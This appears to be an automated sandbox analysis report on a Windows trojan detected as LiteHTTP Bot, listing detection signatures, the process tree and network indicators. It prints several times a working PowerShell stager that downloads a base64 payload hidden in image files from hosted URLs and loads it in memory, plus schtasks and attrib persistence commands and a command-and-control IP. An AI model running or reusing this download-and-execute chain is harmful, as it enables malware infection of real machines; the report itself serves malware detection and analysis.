Windows Analysis Report
3lhrJ4X.exe

Overview

General Information

Sample name: 3lhrJ4X.exe
Analysis ID: 1583964
MD5: 21b5e69aec540eaace5aa6d588896218
SHA1: fcd64b005a42f69bfa94118b0cc92d0ddf06ca29
SHA256: fcbd0c268f201e76e18eebce0bbc6b063bc2fda1dcf4511c19fdc1287a73195e
Tags: exe, malware, trojan, user-Joker
Infos:

Detection

LiteHTTP Bot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Sigma detected: Powershell download and load assembly
Sigma detected: Powershell download payload from hardcoded c2 list
Suricata IDS alerts for network traffic
Yara detected LiteHTTP Bot
Yara detected Powershell download and execute
.NET source code references suspicious native API functions
AI detected suspicious sample
Found strings related to Crypto-Mining
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Protects its processes via BreakOnTermination flag
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Silenttrinity Stager Msbuild Activity
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses attrib.exe to hide files
Uses cmd line tools excessively to alter registry or file data
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain checking for process token information
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains strange resources
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Startup Folder File Write
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • 3lhrJ4X.exe (PID: 7680 cmdline: "C:\Users\user\Desktop\3lhrJ4X.exe" MD5: 21B5E69AEC540EAACE5AA6D588896218)
    • cmd.exe (PID: 7708 cmdline: cmd.exe /c 67784c48226c6.vbs MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wscript.exe (PID: 7784 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\67784c48226c6.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
        • powershell.exe (PID: 7840 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = '<base64-encoded script>';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $dosigo.replace('$','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 7848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 8000 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ghjkkkkkkkk/tdrdreest/downloads/img.jpg?537612', 'https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.knncbbp/sdaolnwod/fwqfwrew/ewqrwfwqf/gro.tekcubtib', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec MD5: 04029E121A0CFA5991749937DD22A1D9)
            • MSBuild.exe (PID: 7256 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
              • schtasks.exe (PID: 7800 cmdline: "schtasks" /Query /TN "Msbuild" MD5: 48C2FE20575769DE916F48EF0676A965)
                • conhost.exe (PID: 7828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • schtasks.exe (PID: 7768 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /sc onlogon /tn "Msbuild" /tr "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe" MD5: 48C2FE20575769DE916F48EF0676A965)
                • conhost.exe (PID: 7756 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • attrib.exe (PID: 3756 cmdline: "attrib.exe" +h +s "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
                • conhost.exe (PID: 6092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • attrib.exe (PID: 3448 cmdline: "attrib.exe" +h +s "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
                • conhost.exe (PID: 2180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • attrib.exe (PID: 2104 cmdline: "attrib.exe" +h +s "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
                • conhost.exe (PID: 6440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • attrib.exe (PID: 6920 cmdline: "attrib.exe" +h +s "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
                • conhost.exe (PID: 6956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • attrib.exe (PID: 6928 cmdline: "attrib.exe" +h +s "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
                • conhost.exe (PID: 7152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • attrib.exe (PID: 8032 cmdline: "attrib.exe" +h +s "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
                • conhost.exe (PID: 8092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • attrib.exe (PID: 2112 cmdline: "attrib.exe" +h +s "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
                • conhost.exe (PID: 7876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • attrib.exe (PID: 7844 cmdline: "attrib.exe" +h +s "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
                • conhost.exe (PID: 7840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • attrib.exe (PID: 3732 cmdline: "attrib.exe" +h +s "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
                • conhost.exe (PID: 3588 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • attrib.exe (PID: 3244 cmdline: "attrib.exe" +h +s "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
                • conhost.exe (PID: 5272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • attrib.exe (PID: 2088 cmdline: "attrib.exe" +h +s "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
                • conhost.exe (PID: 2520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • attrib.exe (PID: 6096 cmdline: "attrib.exe" +h +s "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
                • conhost.exe (PID: 4812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • attrib.exe (PID: 5080 cmdline: "attrib.exe" +h +s "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe" MD5: 0E938DD280E83B1596EC6AA48729C2B0)
                • conhost.exe (PID: 5516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • rundll32.exe (PID: 8132 cmdline: "C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\" MD5: EF3179D498793BF4234F708D3BE28633)
  • MSBuild.exe (PID: 7696 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
    • conhost.exe (PID: 7680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • MSBuild.exe (PID: 5440 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
    • conhost.exe (PID: 3052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000008.00000002.4118790717.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_LiteHTTPBot | Yara detected LiteHTTP Bot | Joe Security
00000006.00000002.1823716932.000001D3BBA89000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_LiteHTTPBot | Yara detected LiteHTTP Bot | Joe Security
Process Memory Space: powershell.exe PID: 7840 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: powershell.exe PID: 7840 | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
  • 0x180a3:$b2: ::FromBase64String(
  • 0x17c550:$b2: ::FromBase64String(
  • 0x17e76:$b3: ::UTF8.GetString(
  • 0x6a66:$s1: -join
  • 0x111f22:$s1: -join
  • 0x325a9:$s3: reverse
  • 0x3dde7:$s3: reverse
  • 0x718be:$s3: reverse
  • 0x78513:$s3: reverse
  • 0x7a4fa:$s3: reverse
  • 0x85529:$s3: reverse
  • 0xea870:$s3: reverse
  • 0xeab5e:$s3: reverse
  • 0xeb278:$s3: reverse
  • 0xeba31:$s3: reverse
  • 0xf2b1c:$s3: reverse
  • 0xf2f36:$s3: reverse
  • 0xf3abe:$s3: reverse
  • 0xf476b:$s3: reverse
  • 0x1661cf:$s3: reverse
  • 0x170096:$s3: reverse
Process Memory Space: powershell.exe PID: 8000 | JoeSecurity_LiteHTTPBot | Yara detected LiteHTTP Bot | Joe Security

Source | Rule | Description | Author | Strings
8.2.MSBuild.exe.400000.0.unpack | JoeSecurity_LiteHTTPBot | Yara detected LiteHTTP Bot | Joe Security
8.2.MSBuild.exe.400000.0.unpack | MALWARE_Win_CoreBot | Detects CoreBot | ditekSHen
  • 0x83ae:$v1_1: newtask
  • 0x6e4c:$v1_6: payload
  • 0x7019:$v1_7: DownloadFile
  • 0x7026:$v1_8: RemoveFile
  • 0x8360:$cnc1: &os=
  • 0x836a:$cnc2: &pv=
  • 0x8374:$cnc3: &ip=
  • 0x837e:$cnc4: &cn=
  • 0x8388:$cnc5: &lr=
  • 0x8392:$cnc6: &ct=
  • 0x839c:$cnc7: &bv=
  • 0x83be:$cnc8: &op=
  • 0x83cc:$cnc9: &td=
  • 0x83e0:$cnc10: &uni=
6.2.powershell.exe.1d3bba895c8.2.unpack | JoeSecurity_LiteHTTPBot | Yara detected LiteHTTP Bot | Joe Security
6.2.powershell.exe.1d3bba895c8.2.unpack | MALWARE_Win_CoreBot | Detects CoreBot | ditekSHen
  • 0x65ae:$v1_1: newtask
  • 0x504c:$v1_6: payload
  • 0x5219:$v1_7: DownloadFile
  • 0x5226:$v1_8: RemoveFile
  • 0x6560:$cnc1: &os=
  • 0x656a:$cnc2: &pv=
  • 0x6574:$cnc3: &ip=
  • 0x657e:$cnc4: &cn=
  • 0x6588:$cnc5: &lr=
  • 0x6592:$cnc6: &ct=
  • 0x659c:$cnc7: &bv=
  • 0x65be:$cnc8: &op=
  • 0x65cc:$cnc9: &td=
  • 0x65e0:$cnc10: &uni=
6.2.powershell.exe.1d3bba895c8.2.raw.unpack | JoeSecurity_LiteHTTPBot | Yara detected LiteHTTP Bot | Joe Security

Source | Rule | Description | Author | Strings
amsi64_8000.amsi.csv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security

Spreading

Source: Process started; Author: Joe Security; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ghjkkkkkkkk/tdrdreest/downloads/img.jpg?537612', 'https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.knncbbp/sdaolnwod/fwqfwrew/ewqrwfwqf/gro.tekcubtib', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ghjkkkkkkkk/tdrdreest/downloads/img.jpg?537612', 'https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex;

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = '<base64-encoded script>
Source: Process started; Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ghjkkkkkkkk/tdrdreest/downloads/img.jpg?537612', 'https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.knncbbp/sdaolnwod/fwqfwrew/ewqrwfwqf/gro.tekcubtib', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ghjkkkkkkkk/tdrdreest/downloads/img.jpg?537612', 'https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex;
                  Source: Process started | Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\67784c48226c6.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\67784c48226c6.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: cmd.exe /c 67784c48226c6.vbs, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7708, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\67784c48226c6.vbs" , ProcessId: 7784, ProcessName: wscript.exe
                  Source: Network Connection | Author: Kiran kumar s, oscd.community: Data: DestinationIp: 87.120.126.5, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 7256, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49822
                  Source: Process started | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\67784c48226c6.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\67784c48226c6.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: cmd.exe /c 67784c48226c6.vbs, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7708, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\67784c48226c6.vbs" , ProcessId: 7784, ProcessName: wscript.exe
                  Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\67784c48226c6.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\67784c48226c6.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: cmd.exe /c 67784c48226c6.vbs, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7708, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\67784c48226c6.vbs" , ProcessId: 7784, ProcessName: wscript.exe
                  Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\3lhrJ4X.exe, ProcessId: 7680, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0
                  Source: File created | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, ProcessId: 7256, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Msbuild.lnk
                  Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ghjkkkkkkkk/tdrdreest/downloads/img.jpg?537612', 'https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.knncbbp/sdaolnwod/fwqfwrew/ewqrwfwqf/gro.tekcubtib', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 
"[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ghjkkkkkkkk/tdrdreest/downloads/img.jpg?537612', 'https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex;
                  Source: Process started | Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\67784c48226c6.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\67784c48226c6.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: cmd.exe /c 67784c48226c6.vbs, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7708, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\67784c48226c6.vbs" , ProcessId: 7784, ProcessName: wscript.exe
                  Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = '…

                  Data Obfuscation

